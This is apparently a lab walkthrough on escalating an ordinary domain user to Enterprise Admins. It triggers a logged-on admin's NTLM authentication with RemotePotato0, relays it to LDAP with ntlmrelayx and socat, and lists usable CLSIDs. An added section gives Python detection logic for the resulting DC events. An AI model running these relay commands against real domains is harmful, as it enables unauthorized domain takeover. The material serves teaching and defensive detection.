# RemotePotato0 + NTLM relay to LDAP

#### Principle

Abuse the DCOM activation service to trigger NTLM authentication from any user currently logged on to the target machine.

#### Attack scenario

* We already have access to a machine as an ordinary domain user, but a high-privileged user is also logged on to that machine.
* Trigger NTLM authentication from the high-privileged user and relay it to LDAP (privilege escalation, configuring resource-based constrained delegation, and so on).

#### Environment

```
kali: 10.10.10.10
dc: 10.10.10.139
victim (Windows Server 2019): 10.10.10.111
```

`net user "test1" /domain` shows that the current user is only an ordinary domain user.

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FTSG3U8s0Lo5QELRAteMh%2F1684140528763.png?alt=media&#x26;token=8a6028e2-e9d4-44c5-adfb-412b73aa0a9f" alt=""><figcaption></figcaption></figure>


`query session` shows that the administrator user (a domain admin in this lab) is logged on.

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FOQlP3nPHnrQz4YYf7lh1%2F1684140613306.png?alt=media&#x26;token=8385e02e-09e8-4057-b706-86bc72abe7c7" alt=""><figcaption></figcaption></figure>


#### Exploitation: privilege escalation

* Port redirection and the ntlmrelayx listener

```
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.10.111:9999 &
sudo ntlmrelayx.py -t ldap://10.10.10.139 --no-wcf-server --escalate-user test1
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F7qPavAX2L5i3NIRBaGr2%2F1684140221312.png?alt=media&#x26;token=9445bb19-66b9-4ddd-a692-e446fce7b030" alt=""><figcaption></figcaption></figure>


* Use `RemotePotato0` to trigger NTLM authentication from the domain admin user logged on in the second session

```
.\RemotePotato0.exe -m 0 -r 10.10.10.10 -x 10.10.10.10 -p 9999 -s 2
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FQfmAx2y9M2CA2OrCeSBm%2F1684140472416.png?alt=media&#x26;token=9e9df5b6-becb-457b-aeef-f834e7dec39c" alt=""><figcaption></figcaption></figure>


After it succeeds, run `net user "test1" /domain` again to check which groups `test1` belongs to.

It is now a member of `Enterprise Admins`, whose members have DCSync rights.

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FlLv0luKwICLe6MqMwQsI%2F1684140572780.png?alt=media&#x26;token=13146d85-9533-488d-ab3f-d56738f60600" alt=""><figcaption></figcaption></figure>
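From the defender's side, the relay described above leaves a recognisable pair of events on the domain controller: an NTLM network logon (4624, logon type 3) of the relayed account from the relay host, followed seconds later by that same account adding a member to a privileged group (4728 for global groups, 4756 for universal groups such as Enterprise Admins). The following is an added detection example, not part of the original page or the RemotePotato0 project; the events, the domain name `example.local` and the five-minute window are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed watch-list: group-add events for these groups always deserve review.
PRIVILEGED_GROUPS = {"Enterprise Admins", "Domain Admins", "Administrators"}
# Assumed correlation window between the NTLM logon and the group change.
WINDOW = timedelta(minutes=5)

def find_relay_escalations(events):
    """Return one alert per privileged group-add (4728/4756) whose acting account
    had an NTLM network logon (4624, type 3) on the DC within WINDOW before it."""
    ntlm_logons = [e for e in events
                   if e["EventID"] == 4624 and e["LogonType"] == 3
                   and e["AuthenticationPackageName"] == "NTLM"]
    alerts = []
    for e in events:
        if e["EventID"] not in (4728, 4756) or e["TargetUserName"] not in PRIVILEGED_GROUPS:
            continue
        t_add = datetime.fromisoformat(e["Time"])
        for lg in ntlm_logons:
            lag = t_add - datetime.fromisoformat(lg["Time"])
            # The 4624 TargetUserName is the account that logged on; the 4756
            # SubjectUserName is the account that performed the group change.
            if lg["TargetUserName"] == e["SubjectUserName"] and timedelta(0) <= lag <= WINDOW:
                alerts.append({"group": e["TargetUserName"], "member": e["MemberName"],
                               "actor": e["SubjectUserName"], "source_ip": lg["IpAddress"],
                               "lag_s": int(lag.total_seconds())})
                break
    return alerts

def sample_events():
    """Constructed DC security events mirroring the walkthrough (relay host 10.10.10.10)."""
    return [
        # Benign: Kerberos machine logon from the member server, no group change after it.
        {"EventID": 4624, "Time": "2023-05-15T09:50:00", "LogonType": 3,
         "AuthenticationPackageName": "Kerberos", "TargetUserName": "WIN2019$",
         "IpAddress": "10.10.10.111"},
        # Relayed Administrator credential reaching LDAP on the DC from the relay host.
        {"EventID": 4624, "Time": "2023-05-15T10:00:00", "LogonType": 3,
         "AuthenticationPackageName": "NTLM", "TargetUserName": "Administrator",
         "IpAddress": "10.10.10.10"},
        # Seconds later the relayed session adds test1 to Enterprise Admins (universal group).
        {"EventID": 4756, "Time": "2023-05-15T10:00:04", "SubjectUserName": "Administrator",
         "TargetUserName": "Enterprise Admins",
         "MemberName": "CN=test1,CN=Users,DC=example,DC=local"},
        # Benign: a non-privileged group add by a helpdesk account with no NTLM logon.
        {"EventID": 4728, "Time": "2023-05-15T10:30:00", "SubjectUserName": "helpdesk",
         "TargetUserName": "Printer Users",
         "MemberName": "CN=bob,CN=Users,DC=example,DC=local"},
    ]
```

Only the Administrator logon plus the Enterprise Admins change is flagged; the Kerberos logon and the helpdesk change produce no alert. Enforcing LDAP signing and channel binding on the DC removes the relay path that this rule detects after the fact.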


#### CLSID list

CLSIDs usable on various Windows versions:

Windows Server 2019

```
{0002DF02-0000-0000-C000-000000000046} - BrowserBroker Class
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4} - AuthBrokerUI
{5167B42F-C111-47A1-ACC4-8EABE61B0B54} - Easconsent.dll
{924DC564-16A6-42EB-929A-9A61FA7DA06F} - Authentication UI CredUI Out of Proc Helper for Non-AppContainer Clients
{934b410c-43e4-415e-9935-fbc081ba93a9} - UserInfoDialog
{BA441419-0B3F-4FB6-A903-D16CC14CCA44} - CLSID_LockScreenContentionFlyout
{c58ca859-80bc-48df-8f06-ffa94a405bff} - Picker Host
{f65817c8-dd85-4136-89f0-b9d12939f2c4} - IsolatedMessageDialogFactory
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} - SPPUIObjectInteractive Class
{f8842f8e-dafe-4b37-9d38-4e0714a61149} - CastServerInteractiveUser
```

Windows Server 2016

```
{924DC564-16A6-42EB-929A-9A61FA7DA06F}
{f65817c8-dd85-4136-89f0-b9d12939f2c4}
{BA441419-0B3F-4FB6-A903-D16CC14CCA44}
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4}
{934b410c-43e4-415e-9935-fbc081ba93a9}
{f8842f8e-dafe-4b37-9d38-4e0714a61149}
{0002DF02-0000-0000-C000-000000000046}
{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
{c58ca859-80bc-48df-8f06-ffa94a405bff}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
```

Windows Server 2008 R2

```
{FCC74B77-EC3E-4dd8-A80B-008A702075A9}
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
```

Full CLSID list --> <http://ohpe.it/juicy-potato/CLSID/>

#### References & tools

[antonioCoco/RemotePotato0: Windows Privilege Escalation from User to Domain Admin. (github.com)](https://github.com/antonioCoco/RemotePotato0/)
